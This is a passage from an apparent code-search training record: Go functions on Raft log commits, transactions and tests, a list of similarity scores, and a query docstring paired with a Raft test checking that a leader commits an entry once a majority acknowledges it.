cmp.Diff(chu.updates, []xdsresource.ClusterUpdate{test.newClusterUpdate}); diff != \"\" {\n\t\t\t\t\tt.Fatalf(\"got unexpected cluster update, diff (-got, +want): %v\", diff)\n\t\t\t\t}\n\t\t\tcase <-ctx.Done():\n\t\t\t\tt.Fatal(\"Timed out waiting for update from updateChannel.\")\n\t\t\t}\n\t\t})\n\t}\n}", "func (b *batcher) Commit(ctx context.Context, commitInfo *files.UploadSessionFinishArg) (entry *files.FileMetadata, err error) {\n\tselect {\n\tcase <-b.closed:\n\t\treturn nil, fserrors.FatalError(errors.New(\"batcher is shutting down\"))\n\tdefault:\n\t}\n\tfs.Debugf(b.f, \"Adding %q to batch\", commitInfo.Commit.Path)\n\tresp := make(chan batcherResponse, 1)\n\tb.in <- batcherRequest{\n\t\tcommitInfo: commitInfo,\n\t\tresult: resp,\n\t}\n\t// If running async then don't wait for the result\n\tif b.async {\n\t\treturn nil, nil\n\t}\n\tresult := <-resp\n\treturn result.entry, result.err\n}", "func (_this *RaftNode) publishEntries(ents []raftpb.Entry) bool {\n\tfor i := range ents {\n\t\tswitch ents[i].Type {\n\t\tcase raftpb.EntryNormal:\n\t\t\tif len(ents[i].Data) == 0 {\n\t\t\t\t// ignore empty messages\n\t\t\t\tbreak\n\t\t\t}\n\t\t\ts := string(ents[i].Data)\n\t\t\tselect {\n\t\t\tcase _this.commitC <- &s:\n\t\t\tcase <-_this.stopc:\n\t\t\t\treturn false\n\t\t\t}\n\n\t\tcase raftpb.EntryConfChange:\n\t\t\tvar cc raftpb.ConfChange\n\t\t\tcc.Unmarshal(ents[i].Data)\n\t\t\t_this.node.ApplyConfChange(cc)\n\t\t\tswitch cc.Type {\n\t\t\tcase raftpb.ConfChangeAddNode:\n\t\t\t\tif len(cc.Context) > 0 {\n\t\t\t\t\t_this.transport.AddPeer(types.ID(cc.NodeID), []string{string(cc.Context)})\n\t\t\t\t}\n\t\t\tcase raftpb.ConfChangeRemoveNode:\n\t\t\t\tif cc.NodeID == uint64(_this.id) {\n\t\t\t\t\tlog.Infof(\"I've been removed from the cluster! Shutting down.\")\n\t\t\t\t\treturn false\n\t\t\t\t}\n\t\t\t\t_this.transport.RemovePeer(types.ID(cc.NodeID))\n\t\t\t}\n\t\t}\n\n\t\t// after commit, update appliedIndex\n\t\t_this.appliedIndex = ents[i].Index\n\n\t\t// special nil commit to signal replay has finished\n\t\tif ents[i].Index == _this.lastIndex {\n\t\t\tselect {\n\t\t\tcase _this.commitC <- nil:\n\t\t\tcase <-_this.stopc:\n\t\t\t\treturn false\n\t\t\t}\n\t\t}\n\t}\n\treturn true\n}", "func (gm *gmap) applyEntries(gmp *gmapProgress, apply *apply) {\n\t// Has entry?\n\tif len(apply.entries) == 0 {\n\t\treturn\n\t}\n\t// Is the node leave the cluster tool long, the latest snapshot is better than the entry.\n\tfirsti := apply.entries[0].Index\n\tif firsti > gmp.appliedi+1 {\n\t\tlogger.Panicf(\"first index of committed entry[%d] should <= appliedi[%d] + 1\", firsti, gmp.appliedi)\n\t}\n\t// Extract useful entries.\n\tvar ents []raftpb.Entry\n\tif gmp.appliedi+1-firsti < uint64(len(apply.entries)) {\n\t\tents = apply.entries[gmp.appliedi+1-firsti:]\n\t}\n\t// Iterate all entries\n\tfor _, e := range ents {\n\t\tswitch e.Type {\n\t\t// Normal entry.\n\t\tcase raftpb.EntryNormal:\n\t\t\tif len(e.Data) != 0 {\n\t\t\t\t// Unmarshal request.\n\t\t\t\tvar req InternalRaftRequest\n\t\t\t\tpbutil.MustUnmarshal(&req, e.Data)\n\n\t\t\t\tvar ar applyResult\n\t\t\t\t// Put new value\n\t\t\t\tif put := req.Put; put != nil {\n\t\t\t\t\t// Get set.\n\t\t\t\t\tset, exist := gm.sets[put.Set]\n\t\t\t\t\tif !exist {\n\t\t\t\t\t\tlogger.Panicf(\"set(%s) is not exist\", put.Set)\n\t\t\t\t\t}\n\t\t\t\t\t// Get key, value and revision.\n\t\t\t\t\tkey, value, revision := put.Key, set.vtype.unwrap(put.Value), e.Index\n\t\t\t\t\t// Get map and put value into map.\n\t\t\t\t\tm := set.get(put.Map)\n\t\t\t\t\tm.put(key, value, revision)\n\t\t\t\t\t// Send put event to watcher\n\t\t\t\t\tevent := MapEvent{Type: PUT, KV: &KeyValue{Key: key, Value: value}}\n\t\t\t\t\tm.watchers.Range(func(key, value interface{}) bool {\n\t\t\t\t\t\tkey.(*watcher).eventc <- event\n\t\t\t\t\t\treturn true\n\t\t\t\t\t})\n\t\t\t\t\t// Set apply result.\n\t\t\t\t\tar.rev = revision\n\t\t\t\t}\n\t\t\t\t// Delete value\n\t\t\t\tif del := req.Delete; del != nil {\n\t\t\t\t\t// Get set.\n\t\t\t\t\tset, exist := gm.sets[del.Set]\n\t\t\t\t\tif !exist {\n\t\t\t\t\t\tlogger.Panicf(\"set(%s) is not exist\", del.Set)\n\t\t\t\t\t}\n\t\t\t\t\t// Get map and delete value from map.\n\t\t\t\t\tm := set.get(del.Map)\n\t\t\t\t\tif pre := m.delete(del.Key); nil != pre {\n\t\t\t\t\t\t// Send put event to watcher\n\t\t\t\t\t\tar.pre = *pre\n\t\t\t\t\t\tevent := MapEvent{Type: DELETE, PrevKV: &KeyValue{Key: del.Key, Value: ar.pre.Value}}\n\t\t\t\t\t\tm.watchers.Range(func(key, value interface{}) bool {\n\t\t\t\t\t\t\tkey.(*watcher).eventc <- event\n\t\t\t\t\t\t\treturn true\n\t\t\t\t\t\t})\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\t// Update value\n\t\t\t\tif update := req.Update; update != nil {\n\t\t\t\t\t// Get set.\n\t\t\t\t\tset, exist := gm.sets[update.Set]\n\t\t\t\t\tif !exist {\n\t\t\t\t\t\tlogger.Panicf(\"set(%s) is not exist\", update.Set)\n\t\t\t\t\t}\n\t\t\t\t\t// Get map.\n\t\t\t\t\tm := set.get(update.Map)\n\t\t\t\t\t// Update value.\n\t\t\t\t\tpre, ok := m.update(update.Key, update.Value, update.Revision, e.Index)\n\t\t\t\t\tif ok {\n\t\t\t\t\t\t// The revision will be set only if update succeed\n\t\t\t\t\t\tar.rev = e.Index\n\t\t\t\t\t}\n\t\t\t\t\tif nil != pre {\n\t\t\t\t\t\tar.pre = *pre\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\t// Trigger proposal waiter.\n\t\t\t\tgm.wait.Trigger(req.ID, &ar)\n\t\t\t}\n\t\t// The configuration of gmap is fixed and wil not be synchronized through raft.\n\t\tcase raftpb.EntryConfChange:\n\t\tdefault:\n\t\t\tlogger.Panicf(\"entry type should be either EntryNormal or EntryConfChange\")\n\t\t}\n\n\t\tgmp.appliedi, gmp.appliedt = e.Index, e.Term\n\t}\n}", "func (m *MockCache) InsertEntry(arg0 string) {\n\tm.ctrl.T.Helper()\n\tm.ctrl.Call(m, \"InsertEntry\", arg0)\n}", "func (p *KVServer) Commit(req CommitRequest, resp *CommitResponse) error {\n\tfmt.Println(\"Received a call to Commit(\", req, \")\")\n\ttx := req.Transaction\n\tmutex.Lock()\n\ttransactions[tx.ID] = tx\n\tmutex.Unlock()\n\tisGenerateNoOps = false\n\tfor isWorkingOnNoOp {\n\t\t// This stopped it from hanging... !\n\t\ttime.Sleep(time.Millisecond)\n\t}\n\tif !isCommitPossible(req.RequiredKeyValues) {\n\t\tmutex.Lock()\n\t\tt := transactions[tx.ID]\n\t\tt.IsAborted = true\n\t\ttransactions[tx.ID] = t\n\t\tmutex.Unlock()\n\t\t*resp = CommitResponse{false, 0, abortedMessage}\n\t\tisGenerateNoOps = true\n\t} else {\n\t\tblockHash := generateCommitBlock(tx.ID, req.RequiredKeyValues)\n\t\tif blockHash == \"\" {\n\t\t\t// a conflicting transaction just commited\n\t\t\tmutex.Lock()\n\t\t\tt := transactions[tx.ID]\n\t\t\tt.IsAborted = true\n\t\t\ttransactions[tx.ID] = t\n\t\t\tmutex.Unlock()\n\t\t\t*resp = CommitResponse{false, 0, abortedMessage + \"Another node committed a conflicting transaction!!\"}\n\t\t\tisGenerateNoOps = true\n\t\t} else {\n\t\t\tisGenerateNoOps = true\n\t\t\tvalidateCommit(req)\n\t\t\tmutex.Lock()\n\t\t\tcommitId := transactions[tx.ID].CommitID\n\t\t\tmutex.Unlock()\n\t\t\t*resp = CommitResponse{true, commitId, \"\"}\n\t\t}\n\t}\n\tprintState()\n\treturn nil\n}", "func TestSquashCommitSetPropagation(t *testing.T) {\n\t// TODO(2.0 optional): Implement put file split in V2.\n\tt.Skip(\"Put file split not implemented in V2\")\n\t// \tif testing.Short() {\n\t// \t\tt.Skip(\"Skipping integration tests in short mode\")\n\t// \t}\n\n\t// \tc := tu.GetPachClient(t)\n\t// \trequire.NoError(t, c.DeleteAll())\n\n\t// \t// Create an input repo\n\t// \trepo := tu.UniqueString(\"TestSquashCommitSetPropagation\")\n\t// \trequire.NoError(t, c.CreateProjectRepo(pfs.DefaultProjectName,repo))\n\t// \t_, err := c.PutFileSplit(repo, \"master\", \"d\", pfs.Delimiter_SQL, 0, 0, 0, false,\n\t// \t\tstrings.NewReader(tu.TestPGDump))\n\t// \trequire.NoError(t, err)\n\n\t// \t// Create a pipeline that roughly validates the header\n\t// \tpipeline := tu.UniqueString(\"TestSplitFileReprocessPL\")\n\t// \trequire.NoError(t, c.CreateProjectPipeline(pfs.DefaultProjectName,\n\t// \t\tpipeline,\n\t// \t\t\"\",\n\t// \t\t[]string{\"/bin/bash\"},\n\t// \t\t[]string{\n\t// \t\t\t`ls /pfs/*/d/*`, // for debugging\n\t// \t\t\t`cars_tables=\"$(grep \"CREATE TABLE public.cars\" /pfs/*/d/* | sort -u | wc -l)\"`,\n\t// \t\t\t`(( cars_tables == 1 )) && exit 0 || exit 1`,\n\t// \t\t},\n\t// \t\t&pps.ParallelismSpec{Constant: 1},\n\t// \t\tclient.NewProjectPFSInput(pfs.DefaultProjectName,repo, \"/d/*\"),\n\t// \t\t\"\",\n\t// \t\tfalse,\n\t// \t))\n\n\t// \t// wait for job to run & check that all rows were processed\n\t// \tvar jobCount int\n\t// \tc.FlushJob([]*pfs.Commit{client.NewProjectCommit(pfs.DefaultProjectName,repo, \"master\")}, nil,\n\t// \t\tfunc(jobInfo *pps.JobInfo) error {\n\t// \t\t\tjobCount++\n\t// \t\t\trequire.Equal(t, 1, jobCount)\n\t// \t\t\trequire.Equal(t, pps.JobState_JOB_SUCCESS, jobInfo.State)\n\t// \t\t\trequire.Equal(t, int64(5), jobInfo.DataProcessed)\n\t// \t\t\trequire.Equal(t, int64(0), jobInfo.DataSkipped)\n\t// \t\t\treturn nil\n\t// \t\t})\n\n\t// \t// put empty dataset w/ new header\n\t// \t_, err = c.PutFileSplit(repo, \"master\", \"d\", pfs.Delimiter_SQL, 0, 0, 0, false,\n\t// \t\tstrings.NewReader(tu.TestPGDumpNewHeader))\n\t// \trequire.NoError(t, err)\n\n\t// \t// everything gets reprocessed (hashes all change even though the files\n\t// \t// themselves weren't altered)\n\t// \tjobCount = 0\n\t// \tc.FlushJob([]*pfs.Commit{client.NewProjectCommit(pfs.DefaultProjectName,repo, \"master\")}, nil,\n\t// \t\tfunc(jobInfo *pps.JobInfo) error {\n\t// \t\t\tjobCount++\n\t// \t\t\trequire.Equal(t, 1, jobCount)\n\t// \t\t\trequire.Equal(t, pps.JobState_JOB_SUCCESS, jobInfo.State)\n\t// \t\t\trequire.Equal(t, int64(5), jobInfo.DataProcessed) // added 3 new rows\n\t// \t\t\trequire.Equal(t, int64(0), jobInfo.DataSkipped)\n\t// \t\t\treturn nil\n\t// \t\t})\n}", "func ExampleLeader() {\n\t// Init server\n\tsrv := redeo.NewServer(nil)\n\n\t// Start raft\n\trft, tsp, err := startRaft(srv)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer rft.Shutdown()\n\tdefer tsp.Close()\n\n\t// Report leader\n\tsrv.Handle(\"raftleader\", redeoraft.Leader(rft))\n\n\t// $ redis-cli -p 9736 raftleader\n\t// \"10.0.0.1:9736\"\n}", "func TestAcceptFCAndConflictingRevision(t *testing.T) {\n\tif testing.Short() {\n\t\tt.SkipNow()\n\t}\n\ttpt, err := createTpoolTester(t.Name())\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tdefer tpt.Close()\n\n\t// Create and fund a valid file contract.\n\tbuilder, err := tpt.wallet.StartTransaction()\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tpayout := types.NewCurrency64(1e9)\n\t_, err = builder.FundContract(payout)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tbuilder.AddFileContract(types.FileContract{\n\t\tWindowStart: tpt.cs.Height() + 2,\n\t\tWindowEnd: tpt.cs.Height() + 5,\n\t\tPayout: payout,\n\t\tValidProofOutputs: []types.SiacoinOutput{{Value: payout}},\n\t\tMissedProofOutputs: []types.SiacoinOutput{{Value: payout}},\n\t\tUnlockHash: types.UnlockConditions{}.UnlockHash(),\n\t})\n\ttSet, err := builder.Sign(true)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\terr = tpt.tpool.AcceptTransactionSet(tSet)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tfcid := tSet[len(tSet)-1].FileContractID(0)\n\n\t// Create a file contract revision and submit it.\n\trSet := []types.Transaction{{\n\t\tFileContractRevisions: []types.FileContractRevision{{\n\t\t\tParentID: fcid,\n\t\t\tNewRevisionNumber: 2,\n\n\t\t\tNewWindowStart: tpt.cs.Height() + 2,\n\t\t\tNewWindowEnd: tpt.cs.Height() + 5,\n\t\t\tNewValidProofOutputs: []types.SiacoinOutput{{Value: payout}},\n\t\t\tNewMissedProofOutputs: []types.SiacoinOutput{{Value: payout}},\n\t\t}},\n\t}}\n\terr = tpt.tpool.AcceptTransactionSet(rSet)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n}", "func (c *Consumer) Commit() error {\n\tsnap := c.resetAcked()\n\tif len(snap) < 1 {\n\t\treturn nil\n\t}\n\n\tfor partitionID, offset := range snap {\n\t\t// fmt.Printf(\"$,%s,%d,%d\\n\", c.id, partitionID, offset+1)\n\t\tif err := c.zoo.Commit(c.group, c.topic, partitionID, offset+1); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\treturn nil\n}", "func (tx *TestTX) Commit() error {\n\targs := tx.Called()\n\treturn args.Error(0)\n}", "func TestCommitMinSize(t *testing.T) {\n\ttestclient := New(\"\")\n\t_, err := setupLocalRepoWithDirRemote(testclient)\n\n\tif err != nil {\n\t\tt.Fatalf(\"Failed to initialise local and remote repositories: %s\", err.Error())\n\t}\n\n\tvar smallsize int64 = 100 // 100 byte file (for git)\n\tvar bigsize int64 = 1024 * 1024 // 1 MiB file (for annex)\n\n\terr = createFile(\"smallfile\", smallsize)\n\tif err != nil {\n\t\tt.Fatalf(\"smallfile create failed: %s\", err.Error())\n\t}\n\terr = createFile(\"bigfile\", bigsize)\n\tif err != nil {\n\t\tt.Fatalf(\"bigfile create failed: %s\", err.Error())\n\t}\n\n\taddchan := make(chan git.RepoFileStatus)\n\tgo git.AnnexAdd([]string{\"smallfile\", \"bigfile\"}, addchan)\n\tfor range addchan {\n\t}\n\n\terr = git.Commit(\"Test commit\")\n\tif err != nil {\n\t\tt.Fatalf(\"Commit failed: %s\", err.Error())\n\t}\n\n\tgitobjs, err := git.LsTree(\"HEAD\", nil)\n\tif err != nil {\n\t\tt.Fatalf(\"git ls-tree failed: %s\", err.Error())\n\t}\n\tif len(gitobjs) != 2 {\n\t\tt.Fatalf(\"Expected 2 git objects, got %d\", len(gitobjs))\n\t}\n\n\tcontents, err := git.CatFileContents(\"HEAD\", \"smallfile\")\n\tif err != nil {\n\t\tt.Fatalf(\"Couldn't read git file contents for smallfile\")\n\t}\n\tif len(contents) != 100 {\n\t\tt.Fatalf(\"Git file content size doesn't match original file size: %d (expected 100)\", len(contents))\n\t}\n\n\tcontents, err = git.CatFileContents(\"HEAD\", \"bigfile\")\n\tif err != nil {\n\t\tt.Fatalf(\"Couldn't read annex file contents for bigfile\")\n\t}\n\tif len(contents) == 1024*1024 {\n\t\tt.Fatalf(\"Annex file content was checked into git\")\n\t}\n\tif len(contents) == 0 {\n\t\tt.Fatalf(\"Annex file not checked into git (content size == 0)\")\n\t}\n}" ]
[ "0.6883694", "0.67447805", "0.66522014", "0.652149", "0.61476606", "0.6147621", "0.5985899", "0.59405583", "0.58946085", "0.5710116", "0.56795913", "0.56135434", "0.5583243", "0.5540832", "0.552765", "0.5499955", "0.54635894", "0.54535663", "0.5443962", "0.5425161", "0.5406838", "0.53860134", "0.53727335", "0.5341019", "0.53274953", "0.53269917", "0.53162205", "0.52361697", "0.5168561", "0.5143146", "0.513943", "0.51372844", "0.51262504", "0.5122703", "0.511307", "0.5099478", "0.5097322", "0.5087228", "0.50449914", "0.5044291", "0.502516", "0.50180024", "0.4992706", "0.49892184", "0.4987513", "0.4977163", "0.49762332", "0.49758536", "0.49740702", "0.49640262", "0.4952578", "0.4926331", "0.4922791", "0.49157816", "0.4912602", "0.49015632", "0.4900315", "0.48987547", "0.48957586", "0.48882976", "0.48833334", "0.48778924", "0.48774764", "0.4873212", "0.48718607", "0.48689258", "0.48546073", "0.48515102", "0.4844768", "0.48342595", "0.48313487", "0.48212636", "0.47936827", "0.4786702", "0.4772507", "0.47595128", "0.4756084", "0.47509632", "0.4746834", "0.47465634", "0.47372574", "0.47244316", "0.47209707", "0.47198635", "0.47097656", "0.47066563", "0.4703877", "0.47032472", "0.46998915", "0.4696832", "0.46875918", "0.4685871", "0.46831024", "0.46811944", "0.4678005", "0.46754372", "0.4674696", "0.46583807", "0.46565863", "0.4651744" ]
0.8186935
0
TestLeaderAcknowledgeCommit tests that a log entry is committed once the leader that created the entry has replicated it on a majority of the servers. Reference: section 5.3
func TestLeaderAcknowledgeCommit(t *testing.T) { tests := []struct { size int acceptors map[uint64]bool wack bool }{ {1, nil, true}, {3, nil, false}, {3, map[uint64]bool{2: true}, true}, {3, map[uint64]bool{2: true, 3: true}, true}, {5, nil, false}, {5, map[uint64]bool{2: true}, false}, {5, map[uint64]bool{2: true, 3: true}, true}, {5, map[uint64]bool{2: true, 3: true, 4: true}, true}, {5, map[uint64]bool{2: true, 3: true, 4: true, 5: true}, true}, } for i, tt := range tests { s := NewMemoryStorage() r := newTestRaft(1, idsBySize(tt.size), 10, 1, s) defer closeAndFreeRaft(r) r.becomeCandidate() r.becomeLeader() commitNoopEntry(r, s) li := r.raftLog.lastIndex() r.Step(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{Data: []byte("some data")}}}) for _, m := range r.readMessages() { if tt.acceptors[m.To] { r.Step(acceptAndReply(m)) } } if g := r.raftLog.committed > li; g != tt.wack { t.Errorf("#%d: ack commit = %v, want %v", i, g, tt.wack) } } }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func TestLeaderCommitEntry(t *testing.T) {\n\ts := NewMemoryStorage()\n\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, s)\n\tdefer closeAndFreeRaft(r)\n\tr.becomeCandidate()\n\tr.becomeLeader()\n\tcommitNoopEntry(r, s)\n\tli := r.raftLog.lastIndex()\n\tr.Step(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{Data: []byte(\"some data\")}}})\n\n\tfor _, m := range r.readMessages() {\n\t\tr.Step(acceptAndReply(m))\n\t}\n\n\tif g := r.raftLog.committed; g != li+1 {\n\t\tt.Errorf(\"committed = %d, want %d\", g, li+1)\n\t}\n\twents := []pb.Entry{{Index: li + 1, Term: 1, Data: []byte(\"some data\")}}\n\tif g := r.raftLog.nextEnts(); !reflect.DeepEqual(g, wents) {\n\t\tt.Errorf(\"nextEnts = %+v, want %+v\", g, wents)\n\t}\n\tmsgs := r.readMessages()\n\tsort.Sort(messageSlice(msgs))\n\tfor i, m := range msgs {\n\t\tif w := uint64(i + 2); m.To != w {\n\t\t\tt.Errorf(\"to = %x, want %x\", m.To, w)\n\t\t}\n\t\tif m.Type != pb.MsgApp {\n\t\t\tt.Errorf(\"type = %v, want %v\", m.Type, pb.MsgApp)\n\t\t}\n\t\tif m.Commit != li+1 {\n\t\t\tt.Errorf(\"commit = %d, want %d\", m.Commit, li+1)\n\t\t}\n\t}\n}", "func TestCommit(t *testing.T) {\n\tconst n = 4\n\tctrl := gomock.NewController(t)\n\ths := New()\n\tkeys := testutil.GenerateKeys(t, n, testutil.GenerateECDSAKey)\n\tbl := testutil.CreateBuilders(t, ctrl, n, keys...)\n\tacceptor := mocks.NewMockAcceptor(ctrl)\n\texecutor := mocks.NewMockExecutor(ctrl)\n\tsynchronizer := synchronizer.New(testutil.FixedTimeout(1000))\n\tcfg, replicas := testutil.CreateMockConfigWithReplicas(t, ctrl, n, keys...)\n\tbl[0].Register(hs, cfg, acceptor, executor, synchronizer, leaderrotation.NewFixed(2))\n\thl := bl.Build()\n\tsigners := hl.Signers()\n\n\t// create the needed blocks and QCs\n\tgenesisQC := hotstuff.NewQuorumCert(nil, 0, hotstuff.GetGenesis().Hash())\n\tb1 := testutil.NewProposeMsg(hotstuff.GetGenesis().Hash(), genesisQC, \"1\", 1, 2)\n\tb1QC := testutil.CreateQC(t, b1.Block, signers)\n\tb2 := testutil.NewProposeMsg(b1.Block.Hash(), b1QC, \"2\", 2, 2)\n\tb2QC := testutil.CreateQC(t, b2.Block, signers)\n\tb3 := testutil.NewProposeMsg(b2.Block.Hash(), b2QC, \"3\", 3, 2)\n\tb3QC := testutil.CreateQC(t, b3.Block, signers)\n\tb4 := testutil.NewProposeMsg(b3.Block.Hash(), b3QC, \"4\", 4, 2)\n\n\t// the second replica will be the leader, so we expect it to receive votes\n\treplicas[1].EXPECT().Vote(gomock.Any()).AnyTimes()\n\treplicas[1].EXPECT().NewView(gomock.Any()).AnyTimes()\n\n\t// executor will check that the correct command is executed\n\texecutor.EXPECT().Exec(gomock.Any()).Do(func(arg interface{}) {\n\t\tif arg.(hotstuff.Command) != b1.Block.Command() {\n\t\t\tt.Errorf(\"Wrong command executed: got: %s, want: %s\", arg, b1.Block.Command())\n\t\t}\n\t})\n\n\t// acceptor expects to receive the commands in order\n\tgomock.InOrder(\n\t\tacceptor.EXPECT().Proposed(gomock.Any()),\n\t\tacceptor.EXPECT().Accept(hotstuff.Command(\"1\")).Return(true),\n\t\tacceptor.EXPECT().Proposed(hotstuff.Command(\"1\")),\n\t\tacceptor.EXPECT().Accept(hotstuff.Command(\"2\")).Return(true),\n\t\tacceptor.EXPECT().Proposed(hotstuff.Command(\"2\")),\n\t\tacceptor.EXPECT().Accept(hotstuff.Command(\"3\")).Return(true),\n\t\tacceptor.EXPECT().Proposed(hotstuff.Command(\"3\")),\n\t\tacceptor.EXPECT().Accept(hotstuff.Command(\"4\")).Return(true),\n\t)\n\n\ths.OnPropose(b1)\n\ths.OnPropose(b2)\n\ths.OnPropose(b3)\n\ths.OnPropose(b4)\n}", "func TestRaftSingleNodeCommit(t *testing.T) {\n\tID1 := \"1\"\n\tclusterPrefix := \"TestRaftSingleNodeCommit\"\n\n\t// Create the Raft node.\n\tfsm := newTestFSM(ID1)\n\tcfg := getTestConfig(ID1, clusterPrefix+ID1)\n\tcfg.LeaderStepdownTimeout = cfg.FollowerTimeout\n\tn := testCreateRaftNode(cfg, newStorage())\n\tn.Start(fsm)\n\tn.ProposeInitialMembership([]string{ID1})\n\n\t// Wait it becomes leader.\n\t<-fsm.leaderCh\n\n\t// Propose 10 commands.\n\tfor i := 0; i < 10; i++ {\n\t\tn.Propose([]byte(\"I'm data-\" + strconv.Itoa(i)))\n\t}\n\n\t// These 10 proposed entries should be applied eventually.\n\tfor i := 0; i < 10; i++ {\n\t\t<-fsm.appliedCh\n\t}\n}", "func (suite *KeeperTestSuite) TestSetPacketAcknowledgement() {\n\tpath := tibctesting.NewPath(suite.chainA, suite.chainB)\n\tsuite.coordinator.SetupClients(path)\n\n\tctxA := suite.chainA.GetContext()\n\tseq := uint64(10)\n\n\tstoredAckHash, found := suite.chainA.App.TIBCKeeper.PacketKeeper.GetPacketAcknowledgement(ctxA, path.EndpointA.ChainName, path.EndpointB.ChainName, seq)\n\tsuite.Require().False(found)\n\tsuite.Require().Nil(storedAckHash)\n\n\tackHash := []byte(\"ackhash\")\n\tsuite.chainA.App.TIBCKeeper.PacketKeeper.SetPacketAcknowledgement(ctxA, path.EndpointA.ChainName, path.EndpointB.ChainName, seq, ackHash)\n\n\tstoredAckHash, found = suite.chainA.App.TIBCKeeper.PacketKeeper.GetPacketAcknowledgement(ctxA, path.EndpointA.ChainName, path.EndpointB.ChainName, seq)\n\tsuite.Require().True(found)\n\tsuite.Require().Equal(ackHash, storedAckHash)\n\tsuite.Require().True(suite.chainA.App.TIBCKeeper.PacketKeeper.HasPacketAcknowledgement(ctxA, path.EndpointA.ChainName, path.EndpointB.ChainName, seq))\n}", "func TestCommitWithoutNewTermEntry(t *testing.T) {\n\ttt := newNetwork(nil, nil, nil, nil, nil)\n\tdefer tt.closeAll()\n\ttt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\t// 0 cannot reach 2,3,4\n\ttt.cut(1, 3)\n\ttt.cut(1, 4)\n\ttt.cut(1, 5)\n\n\ttt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{Data: []byte(\"some data\")}}})\n\ttt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{Data: []byte(\"some data\")}}})\n\n\tsm := tt.peers[1].(*raft)\n\tif sm.raftLog.committed != 1 {\n\t\tt.Errorf(\"committed = %d, want %d\", sm.raftLog.committed, 1)\n\t}\n\n\t// network recovery\n\ttt.recover()\n\n\t// elect 1 as the new leader with term 2\n\t// after append a ChangeTerm entry from the current term, all entries\n\t// should be committed\n\ttt.send(pb.Message{From: 2, To: 2, Type: pb.MsgHup})\n\n\tif sm.raftLog.committed != 4 {\n\t\tt.Errorf(\"committed = %d, want %d\", sm.raftLog.committed, 4)\n\t}\n}", "func TestLogReplication1(t *testing.T) {\n\n\tack := make(chan bool)\n\n\t//Get leader\n\tleaderId := raft.GetLeaderId()\n\n\t//Append a log entry to leader as client\n\traft.InsertFakeLogEntry(leaderId)\n\n\tleaderLog := raft.GetLogAsString(leaderId)\n\t// log.Println(leaderLog)\n\n\ttime.AfterFunc(1*time.Second, func() { ack <- true })\n\t<-ack //Wait for 1 second for log replication to happen\n\n\t//Get logs of all others and compare with each\n\tfor i := 0; i < 5; i++ {\n\t\tcheckIfExpected(t, raft.GetLogAsString(i), leaderLog)\n\t}\n\n}", "func (suite *KeeperTestSuite) TestSetPacketAcknowledgement() {\n\tpath := ibctesting.NewPath(suite.chainA, suite.chainB)\n\tsuite.coordinator.Setup(path)\n\n\tctxA := suite.chainA.GetContext()\n\tseq := uint64(10)\n\n\tstoredAckHash, found := suite.chainA.App.GetIBCKeeper().ChannelKeeper.GetPacketAcknowledgement(ctxA, path.EndpointA.ChannelConfig.PortID, path.EndpointA.ChannelID, seq)\n\tsuite.Require().False(found)\n\tsuite.Require().Nil(storedAckHash)\n\n\tackHash := []byte(\"ackhash\")\n\tsuite.chainA.App.GetIBCKeeper().ChannelKeeper.SetPacketAcknowledgement(ctxA, path.EndpointA.ChannelConfig.PortID, path.EndpointA.ChannelID, seq, ackHash)\n\n\tstoredAckHash, found = suite.chainA.App.GetIBCKeeper().ChannelKeeper.GetPacketAcknowledgement(ctxA, path.EndpointA.ChannelConfig.PortID, path.EndpointA.ChannelID, seq)\n\tsuite.Require().True(found)\n\tsuite.Require().Equal(ackHash, storedAckHash)\n\tsuite.Require().True(suite.chainA.App.GetIBCKeeper().ChannelKeeper.HasPacketAcknowledgement(ctxA, path.EndpointA.ChannelConfig.PortID, path.EndpointA.ChannelID, seq))\n}", "func TestCommitAfterRemoveNode(t *testing.T) {\n\t// Create a cluster with two nodes.\n\ts := NewMemoryStorage()\n\tr := newTestRaft(1, []uint64{1, 2}, 5, 1, s)\n\tdefer closeAndFreeRaft(r)\n\tr.becomeCandidate()\n\tr.becomeLeader()\n\n\t// Begin to remove the second node.\n\tcc := pb.ConfChange{\n\t\tType: pb.ConfChangeRemoveNode,\n\t\tReplicaID: 2,\n\t}\n\tccData, err := cc.Marshal()\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tr.Step(pb.Message{\n\t\tType: pb.MsgProp,\n\t\tEntries: []pb.Entry{\n\t\t\t{Type: pb.EntryConfChange, Data: ccData},\n\t\t},\n\t})\n\t// Stabilize the log and make sure nothing is committed yet.\n\tif ents := nextEnts(r, s); len(ents) > 0 {\n\t\tt.Fatalf(\"unexpected committed entries: %v\", ents)\n\t}\n\tccIndex := r.raftLog.lastIndex()\n\n\t// While the config change is pending, make another proposal.\n\tr.Step(pb.Message{\n\t\tType: pb.MsgProp,\n\t\tEntries: []pb.Entry{\n\t\t\t{Type: pb.EntryNormal, Data: []byte(\"hello\")},\n\t\t},\n\t})\n\n\t// Node 2 acknowledges the config change, committing it.\n\tr.Step(pb.Message{\n\t\tType: pb.MsgAppResp,\n\t\tFrom: 2,\n\t\tIndex: ccIndex,\n\t})\n\tents := nextEnts(r, s)\n\tif len(ents) != 2 {\n\t\tt.Fatalf(\"expected two committed entries, got %v\", ents)\n\t}\n\tif ents[0].Type != pb.EntryNormal || ents[0].Data != nil {\n\t\tt.Fatalf(\"expected ents[0] to be empty, but got %v\", ents[0])\n\t}\n\tif ents[1].Type != pb.EntryConfChange {\n\t\tt.Fatalf(\"expected ents[1] to be EntryConfChange, got %v\", ents[1])\n\t}\n\n\t// Apply the config change. This reduces quorum requirements so 